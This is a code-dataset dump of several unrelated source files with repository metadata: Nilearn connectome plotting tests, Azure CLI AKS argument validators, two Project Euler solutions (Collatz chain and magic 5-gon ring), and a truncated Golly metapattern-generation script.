check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(
adj, coord, '85.3%', linewidth=8.5, marker_size=np.arange(len(coord)))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_connectome():
deprecated_params = {'coords': 'node_coords',
'threshold': 'edge_threshold',
'cmap': 'edge_cmap',
'marker_size': 'node_size',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
adj, coord = _make_connectome()
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_connectome(adjacency_matrix=adj,
coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5, node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
marker_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adj,
coord,
'85.3%',
cm.cyan_orange,
8.5,
4.2,
)
old_params = ['coords', 'threshold', 'cmap', 'marker_size']
raised_warning_messages = ''.join(
str(warning.message) for warning in raised_warnings)
print(raised_warning_messages)
for old_param_ in old_params:
assert warning_msgs[old_param_] in raised_warning_messages
def test_get_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
markers = html_connectome._get_markers(coords, colors)
assert markers["marker_color"] == [
'#ff0000', '#007f00', '#000000', '#ffffff']
assert markers['markers_only']
con_x = decode(markers['_con_x'], '<f4')
assert np.allclose(con_x, coords[:, 0])
def test_view_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
html = html_connectome.view_markers(coords, colors)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords, marker_size=15)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=np.arange(len(coords)))
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=list(range(len(coords))))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_markers():
""" Tests whether use of deprecated keyword parameters of view_markers
raise corrrect warnings.
"""
deprecated_params = {'coords': 'marker_coords',
'colors': 'marker_color',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_markers(coords=coords,
marker_color=colors,
)
html_connectome.view_markers(marker_coords=coords,
colors=colors,
)
html_connectome.view_markers(marker_coords=coords,
marker_color=colors,
)
html_connectome.view_markers(coords,
colors,
)
old_params = ['coords', 'colors']
assert len(raised_warnings) == 2
for old_param_, raised_warning_ in zip(old_params, raised_warnings):
assert warning_msgs[old_param_] == str(raised_warning_.message)
assert raised_warning_.category is DeprecationWarning
| 40.436893
| 78
| 0.508283
|
import warnings
import numpy as np
from nilearn.plotting import cm
from nilearn.plotting.js_plotting_utils import decode
from nilearn.plotting import html_connectome
from .test_js_plotting_utils import check_html
def test_prepare_line():
e = np.asarray([0, 1, 2, 3], dtype=int)
n = np.asarray([[0, 1], [0, 2], [2, 3], [8, 9]], dtype=int)
pe, pn = html_connectome._prepare_line(e, n)
assert (pn == [0, 1, 0, 0, 2, 0, 2, 3, 0, 8, 9, 0]).all()
assert(pe == [0, 0, 0, 1, 1, 0, 2, 2, 0, 3, 3, 0]).all()
def _make_connectome():
adj = np.diag([1.5, .3, 2.5], 2)
adj += adj.T
adj += np.eye(5)
coord = np.arange(5)
coord = np.asarray([coord * 10, -coord, coord[::-1]]).T
return adj, coord
def test_get_connectome():
adj, coord = _make_connectome()
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
expected_x = np.asarray(
[0, 0, 0,
0, 20, 0,
10, 10, 0,
10, 30, 0,
20, 0, 0,
20, 20, 0,
20, 40, 0,
30, 10, 0,
30, 30, 0,
40, 20, 0,
40, 40, 0], dtype='<f4')
assert (con_x == expected_x).all()
assert {'_con_x', '_con_y', '_con_z', '_con_w', 'colorscale'
}.issubset(connectome.keys())
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
adj[adj == 0] = np.nan
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
assert (con_x == expected_x).all()
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
def test_view_connectome():
adj, coord = _make_connectome()
html = html_connectome.view_connectome(adj, coord)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(adj, coord, '85.3%',
title="SOME_TITLE")
check_html(html, False, 'connectome-plot')
assert "SOME_TITLE" in html.html
html = html_connectome.view_connectome(adj, coord, '85.3%',
linewidth=8.5, node_size=4.2)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(
adj, coord, '85.3%', linewidth=8.5, marker_size=np.arange(len(coord)))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_connectome():
deprecated_params = {'coords': 'node_coords',
'threshold': 'edge_threshold',
'cmap': 'edge_cmap',
'marker_size': 'node_size',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
adj, coord = _make_connectome()
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_connectome(adjacency_matrix=adj,
coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5, node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
marker_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adj,
coord,
'85.3%',
cm.cyan_orange,
8.5,
4.2,
)
old_params = ['coords', 'threshold', 'cmap', 'marker_size']
raised_warning_messages = ''.join(
str(warning.message) for warning in raised_warnings)
print(raised_warning_messages)
for old_param_ in old_params:
assert warning_msgs[old_param_] in raised_warning_messages
def test_get_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
markers = html_connectome._get_markers(coords, colors)
assert markers["marker_color"] == [
'#ff0000', '#007f00', '#000000', '#ffffff']
assert markers['markers_only']
con_x = decode(markers['_con_x'], '<f4')
assert np.allclose(con_x, coords[:, 0])
def test_view_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
html = html_connectome.view_markers(coords, colors)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords, marker_size=15)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=np.arange(len(coords)))
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=list(range(len(coords))))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_markers():
deprecated_params = {'coords': 'marker_coords',
'colors': 'marker_color',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_markers(coords=coords,
marker_color=colors,
)
html_connectome.view_markers(marker_coords=coords,
colors=colors,
)
html_connectome.view_markers(marker_coords=coords,
marker_color=colors,
)
html_connectome.view_markers(coords,
colors,
)
old_params = ['coords', 'colors']
assert len(raised_warnings) == 2
for old_param_, raised_warning_ in zip(old_params, raised_warnings):
assert warning_msgs[old_param_] == str(raised_warning_.message)
assert raised_warning_.category is DeprecationWarning
| true
| true
|
790b20490561ed6c0d10e67739b18f7d99b60936
| 8,760
|
py
|
Python
|
src/aks-preview/azext_aks_preview/_validators.py
|
blackchoey/azure-cli-extensions
|
bbfd80ba164c4605dbdbe5e2b8dc26c3aa0f29e4
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/_validators.py
|
blackchoey/azure-cli-extensions
|
bbfd80ba164c4605dbdbe5e2b8dc26c3aa0f29e4
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/_validators.py
|
blackchoey/azure-cli-extensions
|
bbfd80ba164c4605dbdbe5e2b8dc26c3aa0f29e4
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import os.path
import re
from math import ceil
from ipaddress import ip_network
from knack.log import get_logger
from azure.cli.core.util import CLIError
import azure.cli.core.keys as keys
logger = get_logger(__name__)
def validate_ssh_key(namespace):
if hasattr(namespace, 'no_ssh_key') and namespace.no_ssh_key:
return
string_or_file = (namespace.ssh_key_value or
os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub'))
content = string_or_file
if os.path.exists(string_or_file):
logger.info('Use existing SSH public key file: %s', string_or_file)
with open(string_or_file, 'r') as f:
content = f.read()
elif not keys.is_valid_ssh_rsa_public_key(content):
if namespace.generate_ssh_keys:
# figure out appropriate file names:
# 'base_name'(with private keys), and 'base_name.pub'(with public keys)
public_key_filepath = string_or_file
if public_key_filepath[-4:].lower() == '.pub':
private_key_filepath = public_key_filepath[:-4]
else:
private_key_filepath = public_key_filepath + '.private'
content = keys.generate_ssh_keys(private_key_filepath, public_key_filepath)
logger.warning("SSH key files '%s' and '%s' have been generated under ~/.ssh to "
"allow SSH access to the VM. If using machines without "
"permanent storage like Azure Cloud Shell without an attached "
"file share, back up your keys to a safe location",
private_key_filepath, public_key_filepath)
else:
raise CLIError('An RSA key file or key value must be supplied to SSH Key Value. '
'You can use --generate-ssh-keys to let CLI generate one for you')
namespace.ssh_key_value = content
def validate_create_parameters(namespace):
if not namespace.name:
raise CLIError('--name has no value')
if namespace.dns_name_prefix is not None and not namespace.dns_name_prefix:
raise CLIError('--dns-prefix has no value')
def validate_k8s_version(namespace):
"""Validates a string as a possible Kubernetes version. An empty string is also valid, which tells the server
to use its default version."""
if namespace.kubernetes_version:
        k8s_release_regex = re.compile(r'^[vV]?(\d+\.\d+\.\d+.*)$')
found = k8s_release_regex.findall(namespace.kubernetes_version)
if found:
namespace.kubernetes_version = found[0]
else:
raise CLIError('--kubernetes-version should be the full version number, '
'such as "1.7.12" or "1.8.7"')
def validate_linux_host_name(namespace):
"""Validates a string as a legal host name component.
This validation will also occur server-side in the ARM API, but that may take
a minute or two before the user sees it. So it's more user-friendly to validate
in the CLI pre-flight.
"""
# https://stackoverflow.com/questions/106179/regular-expression-to-match-dns-hostname-or-ip-address
rfc1123_regex = re.compile(r'^([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])(\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9]))*$') # pylint:disable=line-too-long
found = rfc1123_regex.findall(namespace.name)
if not found:
raise CLIError('--name cannot exceed 63 characters and can only contain '
'letters, numbers, or dashes (-).')
def validate_max_pods(namespace):
"""Validates that max_pods is set to a reasonable minimum number."""
    # kube-proxy and kube-svc reside on each node;
    # 2 kube-proxy pods and 1 each of azureproxy/heapster/dashboard/tunnelfront run in kube-system
minimum_pods_required = ceil((namespace.node_count * 2 + 6 + 1) / namespace.node_count)
if namespace.max_pods != 0 and namespace.max_pods < minimum_pods_required:
raise CLIError('--max-pods must be at least {} for a managed Kubernetes cluster to function.'
.format(minimum_pods_required))
def validate_nodes_count(namespace):
"""Validate that min_count and max_count is set to 1-100"""
if namespace.min_count is not None:
if namespace.min_count < 1 or namespace.min_count > 100:
raise CLIError('--min-count must be in the range [1,100]')
if namespace.max_count is not None:
if namespace.max_count < 1 or namespace.max_count > 100:
raise CLIError('--max-count must be in the range [1,100]')
def validate_ip_ranges(namespace):
if namespace.api_server_authorized_ip_ranges is not None:
if namespace.api_server_authorized_ip_ranges == '':
return
for ip in namespace.api_server_authorized_ip_ranges.split(','):
try:
ip_network(ip)
except ValueError:
raise CLIError("--api-server-authorized-ip-ranges should be list of IPv4 addresses or CIDRs")
def validate_nodepool_name(namespace):
"""Validates a nodepool name to be at most 12 characters, alphanumeric only."""
if namespace.nodepool_name != "":
if len(namespace.nodepool_name) > 12:
            raise CLIError('--nodepool-name can contain at most 12 characters')
if not namespace.nodepool_name.isalnum():
raise CLIError('--nodepool-name should only contain alphanumeric characters')
def validate_vm_set_type(namespace):
"""Validates the vm set type string."""
if namespace.vm_set_type is not None:
if namespace.vm_set_type == '':
return
if namespace.vm_set_type.lower() != "availabilityset" and \
namespace.vm_set_type.lower() != "virtualmachinescalesets":
raise CLIError("--vm-set-type can only be VirtualMachineScaleSets or AvailabilitySet")
def validate_load_balancer_sku(namespace):
"""Validates the load balancer sku string."""
if namespace.load_balancer_sku is not None:
if namespace.load_balancer_sku == '':
return
if namespace.load_balancer_sku.lower() != "basic" and namespace.load_balancer_sku.lower() != "standard":
raise CLIError("--load-balancer-sku can only be standard or basic")
def validate_load_balancer_outbound_ips(namespace):
"""validate load balancer profile outbound IP ids"""
if namespace.load_balancer_outbound_ips is not None:
ip_id_list = [x.strip() for x in namespace.load_balancer_outbound_ips.split(',')]
if not all(ip_id_list):
raise CLIError("--load-balancer-outbound-ips cannot contain whitespace")
def validate_load_balancer_outbound_ip_prefixes(namespace):
"""validate load balancer profile outbound IP prefix ids"""
if namespace.load_balancer_outbound_ip_prefixes is not None:
ip_prefix_id_list = [x.strip() for x in namespace.load_balancer_outbound_ip_prefixes.split(',')]
if not all(ip_prefix_id_list):
raise CLIError("--load-balancer-outbound-ip-prefixes cannot contain whitespace")
def validate_taints(namespace):
"""Validates that provided taint is a valid format"""
regex = re.compile(r"^[a-zA-Z\d][\w\-\.\/]{0,252}=[a-zA-Z\d][\w\-\.]{0,62}:(NoSchedule|PreferNoSchedule|NoExecute)$") # pylint: disable=line-too-long
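    # The expected format is "key=value:effect", where effect must be one of
    # NoSchedule, PreferNoSchedule or NoExecute, e.g. "sku=gpu:NoSchedule".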
if namespace.node_taints is not None and namespace.node_taints != '':
for taint in namespace.node_taints.split(','):
if taint == "":
continue
found = regex.findall(taint)
if not found:
raise CLIError('Invalid node taint: %s' % taint)
def validate_priority(namespace):
"""Validates the node pool priority string."""
if namespace.priority is not None:
if namespace.priority == '':
return
if namespace.priority != "Low" and \
namespace.priority != "Regular":
raise CLIError("--priority can only be Low or Regular")
def validate_eviction_policy(namespace):
"""Validates the node pool priority string."""
if namespace.eviction_policy is not None:
if namespace.eviction_policy == '':
return
if namespace.eviction_policy != "Delete" and \
namespace.eviction_policy != "Deallocate":
raise CLIError("--eviction-policy can only be Delete or Deallocate")
| 45.388601
| 184
| 0.649201
|
import os
import os.path
import re
from math import ceil
from ipaddress import ip_network
from knack.log import get_logger
from azure.cli.core.util import CLIError
import azure.cli.core.keys as keys
logger = get_logger(__name__)
def validate_ssh_key(namespace):
if hasattr(namespace, 'no_ssh_key') and namespace.no_ssh_key:
return
string_or_file = (namespace.ssh_key_value or
os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub'))
content = string_or_file
if os.path.exists(string_or_file):
logger.info('Use existing SSH public key file: %s', string_or_file)
with open(string_or_file, 'r') as f:
content = f.read()
elif not keys.is_valid_ssh_rsa_public_key(content):
if namespace.generate_ssh_keys:
public_key_filepath = string_or_file
if public_key_filepath[-4:].lower() == '.pub':
private_key_filepath = public_key_filepath[:-4]
else:
private_key_filepath = public_key_filepath + '.private'
content = keys.generate_ssh_keys(private_key_filepath, public_key_filepath)
logger.warning("SSH key files '%s' and '%s' have been generated under ~/.ssh to "
"allow SSH access to the VM. If using machines without "
"permanent storage like Azure Cloud Shell without an attached "
"file share, back up your keys to a safe location",
private_key_filepath, public_key_filepath)
else:
raise CLIError('An RSA key file or key value must be supplied to SSH Key Value. '
'You can use --generate-ssh-keys to let CLI generate one for you')
namespace.ssh_key_value = content
def validate_create_parameters(namespace):
if not namespace.name:
raise CLIError('--name has no value')
if namespace.dns_name_prefix is not None and not namespace.dns_name_prefix:
raise CLIError('--dns-prefix has no value')
def validate_k8s_version(namespace):
if namespace.kubernetes_version:
        k8s_release_regex = re.compile(r'^[vV]?(\d+\.\d+\.\d+.*)$')
found = k8s_release_regex.findall(namespace.kubernetes_version)
if found:
namespace.kubernetes_version = found[0]
else:
raise CLIError('--kubernetes-version should be the full version number, '
'such as "1.7.12" or "1.8.7"')
def validate_linux_host_name(namespace):
rfc1123_regex = re.compile(r'^([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])(\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9]))*$')
found = rfc1123_regex.findall(namespace.name)
if not found:
raise CLIError('--name cannot exceed 63 characters and can only contain '
'letters, numbers, or dashes (-).')
def validate_max_pods(namespace):
minimum_pods_required = ceil((namespace.node_count * 2 + 6 + 1) / namespace.node_count)
if namespace.max_pods != 0 and namespace.max_pods < minimum_pods_required:
raise CLIError('--max-pods must be at least {} for a managed Kubernetes cluster to function.'
.format(minimum_pods_required))
def validate_nodes_count(namespace):
if namespace.min_count is not None:
if namespace.min_count < 1 or namespace.min_count > 100:
raise CLIError('--min-count must be in the range [1,100]')
if namespace.max_count is not None:
if namespace.max_count < 1 or namespace.max_count > 100:
raise CLIError('--max-count must be in the range [1,100]')
def validate_ip_ranges(namespace):
if namespace.api_server_authorized_ip_ranges is not None:
if namespace.api_server_authorized_ip_ranges == '':
return
for ip in namespace.api_server_authorized_ip_ranges.split(','):
try:
ip_network(ip)
except ValueError:
raise CLIError("--api-server-authorized-ip-ranges should be list of IPv4 addresses or CIDRs")
def validate_nodepool_name(namespace):
if namespace.nodepool_name != "":
if len(namespace.nodepool_name) > 12:
            raise CLIError('--nodepool-name can contain at most 12 characters')
if not namespace.nodepool_name.isalnum():
raise CLIError('--nodepool-name should only contain alphanumeric characters')
def validate_vm_set_type(namespace):
if namespace.vm_set_type is not None:
if namespace.vm_set_type == '':
return
if namespace.vm_set_type.lower() != "availabilityset" and \
namespace.vm_set_type.lower() != "virtualmachinescalesets":
raise CLIError("--vm-set-type can only be VirtualMachineScaleSets or AvailabilitySet")
def validate_load_balancer_sku(namespace):
if namespace.load_balancer_sku is not None:
if namespace.load_balancer_sku == '':
return
if namespace.load_balancer_sku.lower() != "basic" and namespace.load_balancer_sku.lower() != "standard":
raise CLIError("--load-balancer-sku can only be standard or basic")
def validate_load_balancer_outbound_ips(namespace):
if namespace.load_balancer_outbound_ips is not None:
ip_id_list = [x.strip() for x in namespace.load_balancer_outbound_ips.split(',')]
if not all(ip_id_list):
raise CLIError("--load-balancer-outbound-ips cannot contain whitespace")
def validate_load_balancer_outbound_ip_prefixes(namespace):
if namespace.load_balancer_outbound_ip_prefixes is not None:
ip_prefix_id_list = [x.strip() for x in namespace.load_balancer_outbound_ip_prefixes.split(',')]
if not all(ip_prefix_id_list):
raise CLIError("--load-balancer-outbound-ip-prefixes cannot contain whitespace")
def validate_taints(namespace):
regex = re.compile(r"^[a-zA-Z\d][\w\-\.\/]{0,252}=[a-zA-Z\d][\w\-\.]{0,62}:(NoSchedule|PreferNoSchedule|NoExecute)$")
if namespace.node_taints is not None and namespace.node_taints != '':
for taint in namespace.node_taints.split(','):
if taint == "":
continue
found = regex.findall(taint)
if not found:
raise CLIError('Invalid node taint: %s' % taint)
def validate_priority(namespace):
if namespace.priority is not None:
if namespace.priority == '':
return
if namespace.priority != "Low" and \
namespace.priority != "Regular":
raise CLIError("--priority can only be Low or Regular")
def validate_eviction_policy(namespace):
if namespace.eviction_policy is not None:
if namespace.eviction_policy == '':
return
if namespace.eviction_policy != "Delete" and \
namespace.eviction_policy != "Deallocate":
raise CLIError("--eviction-policy can only be Delete or Deallocate")
| true
| true
|
790b20caefe2c94a43433ce3db4e17257b12fc27
| 448
|
py
|
Python
|
Python/14 - Longest Collatz sequence/main.py
|
Dinoosawruss/project-euler
|
9be76ef134671fb0b4e1caa412173770b2edfcfd
|
[
"MIT"
] | null | null | null |
Python/14 - Longest Collatz sequence/main.py
|
Dinoosawruss/project-euler
|
9be76ef134671fb0b4e1caa412173770b2edfcfd
|
[
"MIT"
] | null | null | null |
Python/14 - Longest Collatz sequence/main.py
|
Dinoosawruss/project-euler
|
9be76ef134671fb0b4e1caa412173770b2edfcfd
|
[
"MIT"
] | null | null | null |
steps = 0
c = {}
m = 1
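# Project Euler 14: find the starting number below one million that produces the
# longest Collatz chain. `steps` accumulates the chain length for the current
# starting number, `c` memoizes chain lengths already computed, and `m` tracks
# the starting number with the longest chain found so far.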
def collatz(n):
global steps
if n in c:
steps += c[n]
return
if n == 1:
return
steps += 1
if n % 2 == 0:
collatz(n/2)
return
collatz(3 * n + 1)
def main(max):
global steps
global m
for i in range(1, max):
collatz(i)
c[i] = steps
if steps > c[m]:
m = i
steps = 0
main(1000000)
print(m)
| 11.487179
| 27
| 0.419643
|
steps = 0
c = {}
m = 1
def collatz(n):
global steps
if n in c:
steps += c[n]
return
if n == 1:
return
steps += 1
if n % 2 == 0:
collatz(n/2)
return
collatz(3 * n + 1)
def main(max):
global steps
global m
for i in range(1, max):
collatz(i)
c[i] = steps
if steps > c[m]:
m = i
steps = 0
main(1000000)
print(m)
| true
| true
|
790b20ed7e1c6e50df0dd5e3a47b79b8bfae940b
| 1,656
|
py
|
Python
|
project_euler/solutions/problem_68.py
|
cryvate/project-euler
|
6ed13880d7916c34554559f5f71662a863735eda
|
[
"MIT"
] | null | null | null |
project_euler/solutions/problem_68.py
|
cryvate/project-euler
|
6ed13880d7916c34554559f5f71662a863735eda
|
[
"MIT"
] | 9
|
2017-02-20T23:41:40.000Z
|
2017-04-16T15:36:54.000Z
|
project_euler/solutions/problem_68.py
|
cryvate/project-euler
|
6ed13880d7916c34554559f5f71662a863735eda
|
[
"MIT"
] | null | null | null |
from typing import List, Generator
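# Project Euler 68 ("magic 5-gon ring"): n_gons enumerates placements of the
# numbers 1..2*size around the ring, pruning any partial placement whose
# three-number line sums disagree, and solve() returns the largest 16-digit
# concatenated description for the 5-gon case.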
def n_gons(partial: List[int], size: int, sums: int=None) -> \
Generator[List[int], None, None]:
length = len(partial)
if length == size * 2:
yield partial
for i in range(1, size * 2 + 1):
if i in partial:
continue
partial.append(i)
if length == 2:
sums = sum(partial[0: 3])
elif (length > 2 and length % 2 == 0 and
sums != sum(partial[-1: -4: -1]))\
or \
(length == size * 2 - 1 and sums != partial[1] + partial[-1] +
partial[-2]):
partial.pop()
continue
yield from n_gons(list(partial), size, sums)
partial.pop()
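# The description is rotated so that it starts from the line with the smallest
# external node (as the problem statement requires) before the three values of
# each line are concatenated in ring order.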
def n_gon_to_representation(n_gon: List[int]) -> int:
n_gon_str = [str(n) for n in n_gon]
size = len(n_gon_str) // 2
result = ''
minimal = min(n_gon[0], *n_gon[3::2])
index = n_gon.index(minimal)
start = n_gon.index(minimal) // 2 if index >= 3 else 0
for i in range(start, start + size):
current = i % size
if current == 0:
result += ''.join(n_gon_str[0:3])
elif current == size - 1:
result += ''.join([n_gon_str[-1], n_gon_str[-2], n_gon_str[1]])
else:
result += ''.join([n_gon_str[current * 2 + 1],
n_gon_str[current * 2],
n_gon_str[current * 2 + 2]])
return int(result)
def solve() -> int:
return max([n_gon_to_representation(n_gon)
for n_gon in n_gons([], 5)
if n_gon_to_representation(n_gon) < 10 ** 16])
| 27.147541
| 75
| 0.504227
|
from typing import List, Generator
def n_gons(partial: List[int], size: int, sums: int=None) -> \
Generator[List[int], None, None]:
length = len(partial)
if length == size * 2:
yield partial
for i in range(1, size * 2 + 1):
if i in partial:
continue
partial.append(i)
if length == 2:
sums = sum(partial[0: 3])
elif (length > 2 and length % 2 == 0 and
sums != sum(partial[-1: -4: -1]))\
or \
(length == size * 2 - 1 and sums != partial[1] + partial[-1] +
partial[-2]):
partial.pop()
continue
yield from n_gons(list(partial), size, sums)
partial.pop()
def n_gon_to_representation(n_gon: List[int]) -> int:
n_gon_str = [str(n) for n in n_gon]
size = len(n_gon_str) // 2
result = ''
minimal = min(n_gon[0], *n_gon[3::2])
index = n_gon.index(minimal)
start = n_gon.index(minimal) // 2 if index >= 3 else 0
for i in range(start, start + size):
current = i % size
if current == 0:
result += ''.join(n_gon_str[0:3])
elif current == size - 1:
result += ''.join([n_gon_str[-1], n_gon_str[-2], n_gon_str[1]])
else:
result += ''.join([n_gon_str[current * 2 + 1],
n_gon_str[current * 2],
n_gon_str[current * 2 + 2]])
return int(result)
def solve() -> int:
return max([n_gon_to_representation(n_gon)
for n_gon in n_gons([], 5)
if n_gon_to_representation(n_gon) < 10 ** 16])
| true
| true
|
790b2172f11693a484bd3b9749b5261fd8dd9c4e
| 3,190
|
py
|
Python
|
MetafierV2.py
|
IkeoluwaStat/QFT
|
fe36763e90e3601dfab2a78a08962113343efd0c
|
[
"MIT"
] | 163
|
2017-07-31T23:07:56.000Z
|
2022-01-30T03:07:12.000Z
|
MetafierV2.py
|
IkeoluwaStat/QFT
|
fe36763e90e3601dfab2a78a08962113343efd0c
|
[
"MIT"
] | null | null | null |
MetafierV2.py
|
IkeoluwaStat/QFT
|
fe36763e90e3601dfab2a78a08962113343efd0c
|
[
"MIT"
] | 7
|
2017-09-14T16:42:06.000Z
|
2022-02-25T15:04:01.000Z
|
# Metafier V2: writes directly to output.mc
# Uses numpy and memoization to speed up a crap ton & compress data a bit
# ===REQUIRES metatemplate11.mc===
import golly as g
import numpy as np
from shutil import copyfile
#Get the selection
selection = g.getselrect()
if not selection: g.exit("No selection.")
#Get the cells in the selection
cells = g.getcells(selection)
if not cells: g.exit("No pattern in selection")
if len(cells) % 3: cells = cells[:-1]
selw = selection[2]
selh = selection[3]
patternsize = 1 << int(np.ceil(np.log2(selh | selw)))
metapattern = np.zeros((patternsize, patternsize))
#Pseudo-convolution, to detect diagonal neighbors
# +1 +0 +2
# +0 *16 +0
# +4 +0 +8
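# Each live cell writes 16 * its state into its own position and one bit (1, 2,
# 4 or 8, depending on direction) into each diagonal neighbour's position, so a
# position's final value encodes its own state plus which diagonal neighbours
# are occupied.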
for cell in np.reshape(cells, (-1, 3)):
selx = cell[0] - selection[0]
sely = cell[1] - selection[1]
metapattern[sely][selx] += 16 * cell[2]
if sely:
if selx:
metapattern[sely - 1][selx - 1] += 8
if selx + 1 < selw:
metapattern[sely - 1][selx + 1] += 4
if sely + 1 < selh:
if selx:
metapattern[sely + 1][selx - 1] += 2
if selx + 1 < selw:
metapattern[sely + 1][selx + 1] += 1
#Remove all B/S cells
metapattern[metapattern < 32] = np.nan
metapattern += 5630 - 32 #5632 is starting point of 11s in template
metapattern[np.isnan(metapattern)] = 0
metapattern = metapattern.astype(int)
#Using metatemplate11, memoization, and some recursion
def createLine(pattern, outfile, linenum = [5726], memo = {}): #linenum and memo are mutable function arguments, which are only initialized during function definition
if tuple(pattern.ravel().tolist()) not in memo: #If we haven't seen this type of pattern before, let's remember it
if pattern.shape[0] == 2: #Pattern is a leaf, write leaf line
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
pattern[0, 0],
pattern[0, 1],
pattern[1, 0],
pattern[1, 1]))
else: #Pattern is a branch, keep going down quadtree
subpatterns = pattern.reshape(2, pattern.shape[0] >> 1, 2, pattern.shape[0] >> 1).swapaxes(1,2)
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
createLine(subpatterns[0, 0], outfile),
createLine(subpatterns[0, 1], outfile),
createLine(subpatterns[1, 0], outfile),
createLine(subpatterns[1, 1], outfile)))
memo[tuple(pattern.ravel().tolist())] = linenum[0]
linenum[0] += 1
return memo[tuple(pattern.ravel().tolist())]
copyfile('metatemplate11.mc', 'output.mc')
with open('output.mc', 'a') as outputfile:
createLine(metapattern, outputfile)
#Display output.mc
g.addlayer()
g.open('output.mc')
#TODO: Use metatemplate10?
| 40.379747
| 167
| 0.551097
|
import golly as g
import numpy as np
from shutil import copyfile
selection = g.getselrect()
if not selection: g.exit("No selection.")
cells = g.getcells(selection)
if not cells: g.exit("No pattern in selection")
if len(cells) % 3: cells = cells[:-1]
selw = selection[2]
selh = selection[3]
patternsize = 1 << int(np.ceil(np.log2(selh | selw)))
